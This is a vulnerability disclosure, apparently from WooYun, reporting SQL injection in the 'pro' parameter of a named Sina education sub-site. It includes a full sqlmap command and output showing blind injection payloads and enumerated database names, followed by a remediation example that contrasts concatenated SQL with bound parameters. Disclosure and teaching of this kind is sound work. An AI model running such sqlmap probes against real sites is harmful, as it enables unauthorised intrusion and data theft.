
SQL injection in another Sina sub-site

2014-10-20 08:40

http://ischool.edu.sina.com.cn/app_school/interface/getproOrder?pro=1





Injection point: the pro parameter

Proof of vulnerability:

Code block:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://ischool.edu.sina.com.cn/app_school/interface/getproOrder?pro=1" --dbms=mysql --dbs --threads 5

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:48:00

[22:48:00] [INFO] testing connection to the target url
[22:48:01] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pro
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pro=1 AND 7021=7021

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: pro=1 AND SLEEP(5)
---

[22:48:01] [INFO] testing MySQL
[22:48:01] [WARNING] reflective value(s) found and filtering out
[22:48:01] [INFO] confirming MySQL
[22:48:01] [INFO] the back-end DBMS is MySQL

web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[22:48:01] [INFO] fetching database names
[22:48:01] [INFO] fetching number of databases
[22:48:01] [INFO] retrieved: 3
[22:48:03] [INFO] retrieving the length of query output
[22:48:03] [INFO] retrieved: 18
[22:48:12] [INFO] retrieved: information_schema
[22:48:12] [INFO] retrieving the length of query output
[22:48:12] [INFO] retrieved: 11
[22:48:18] [INFO] retrieved: consultants
[22:48:18] [INFO] retrieving the length of query output
[22:48:18] [INFO] retrieved: 4
[22:48:20] [INFO] retrieved: test
available databases [3]:
[*] consultants
[*] information_schema
[*] test

[22:48:20] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/ischool.edu.sina.com.cn'

[*] shutting down at 22:48:20

Fix:

Filter the pro parameter.
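The report's boolean-based blind finding (pro=1 AND 7021=7021 flips the result set) is the signature of a parameter spliced directly into SQL text. The following is an added example, not code from the report or from the affected site: it shows that pattern next to the hardened form, which validates the type of pro and binds it as a query parameter. The table pro_order, its rows, and the use of an in-memory SQLite database as a stand-in for the MySQL backend are all constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the MySQL backend; table and rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pro_order (id INTEGER PRIMARY KEY, pro INTEGER, name TEXT)"
    )
    conn.executemany(
        "INSERT INTO pro_order (pro, name) VALUES (?, ?)",
        [(1, "alpha"), (1, "beta"), (2, "gamma")],
    )
    return conn


def get_pro_order_vulnerable(conn, pro):
    """String concatenation: whatever arrives in ?pro= becomes part of the SQL text.

    This is the pattern the report's boolean-based blind finding implies: a
    true/false expression appended to the parameter changes the result set.
    """
    sql = "SELECT name FROM pro_order WHERE pro = " + pro
    return [row[0] for row in conn.execute(sql)]


def get_pro_order_fixed(conn, pro):
    """Hardened version: validate the type, then bind the value as a parameter.

    The value is never spliced into the SQL text, so an appended expression
    is rejected at the type check instead of being evaluated by the database.
    """
    try:
        pro_id = int(pro)
    except (TypeError, ValueError):
        raise ValueError("pro must be an integer id")
    return [
        row[0]
        for row in conn.execute(
            "SELECT name FROM pro_order WHERE pro = ?", (pro_id,)
        )
    ]


def compare(conn, probe):
    """Return (vulnerable_rows, fixed_outcome) for one value of ?pro=.

    fixed_outcome is either the row list or the string 'rejected'.
    """
    vuln = get_pro_order_vulnerable(conn, probe)
    try:
        fixed = get_pro_order_fixed(conn, probe)
    except ValueError:
        fixed = "rejected"
    return vuln, fixed


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1 AND 1=1", "1 AND 1=2"):
        print(repr(probe), "->", compare(db, probe))
```

Running the block shows the vulnerable query returning two rows for "1" and "1 AND 1=1" but none for "1 AND 1=2", which is exactly the true/false difference sqlmap keyed on; the hardened query returns the same two rows for "1" and rejects both appended expressions before they reach the database. Filtering alone is a weaker fix than this because it has to anticipate every encoding of a payload, whereas a bound parameter is never parsed as SQL.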

Source: www.wooyun.org/bugs/wooyun-2014-075092
